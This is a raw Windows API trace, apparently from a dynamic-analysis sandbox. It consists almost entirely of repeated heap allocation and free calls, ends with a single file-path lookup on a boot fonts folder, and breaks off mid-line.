[0173.675] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.675] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.675] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.675] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8d2f0 [0173.675] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.675] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.675] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.675] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.675] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.675] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.675] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.675] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.675] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.675] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.675] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.675] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.676] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.676] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.676] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.676] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.676] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.676] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.676] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.676] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.676] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.676] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.676] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.676] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.676] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.676] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.676] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.676] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.676] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.676] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.676] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.676] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.676] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x326560 [0173.676] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.676] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.676] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.676] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.676] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.676] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.676] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.676] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.676] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.676] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x326560 [0173.676] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.676] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.676] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.676] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.676] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.676] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.676] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.676] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.677] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.677] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.677] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.677] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.677] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.677] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.677] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.677] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.677] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.677] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.677] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.677] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.677] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.677] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x326560 [0173.677] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.677] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.677] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.677] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.677] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8d2f0 [0173.677] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.677] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.677] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.677] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8d2f0 [0173.677] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.677] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.677] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.677] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.677] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.677] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.677] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.677] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.677] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.677] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.677] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.677] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.677] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.677] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.677] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.678] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.678] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.678] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.678] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.678] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.678] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.678] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.678] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.678] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.678] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.678] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.678] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.678] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.678] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.678] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.678] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.678] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.678] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x326560 [0173.678] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.678] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.678] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.678] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.678] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.678] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.678] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.678] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.678] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.678] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.678] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.678] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.678] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.678] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.678] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.678] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.678] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.678] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.678] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.678] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.679] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.679] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.679] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.679] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.679] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.679] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x326560 [0173.679] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.679] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.679] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.679] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.679] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8d2f0 [0173.679] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.679] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.679] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.679] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8d2f0 [0173.679] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.679] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.679] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.679] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.679] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.679] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.679] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.679] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.679] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.679] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.679] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.679] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.679] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.679] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.679] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.679] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.679] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.679] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.679] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.679] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.679] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.679] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.679] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.680] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.680] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.680] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.680] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.680] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.680] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.680] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.680] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.680] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.680] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x326560 [0173.680] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.680] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.680] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.680] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.680] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.680] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.680] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.680] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.680] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.680] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.680] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.680] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.680] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.680] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.680] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.680] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.680] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.680] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.680] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.680] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.680] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.680] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.680] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.680] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.680] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.680] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x326560 [0173.680] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.681] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.681] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8d2f0 [0173.681] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.681] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.681] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.681] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.681] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.681] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.681] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.681] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.681] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.681] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.681] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.681] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.681] PathFindFileNameW (pszPath="C:\\Boot\\Fonts\\") returned="Fonts\\" [0173.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.681] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 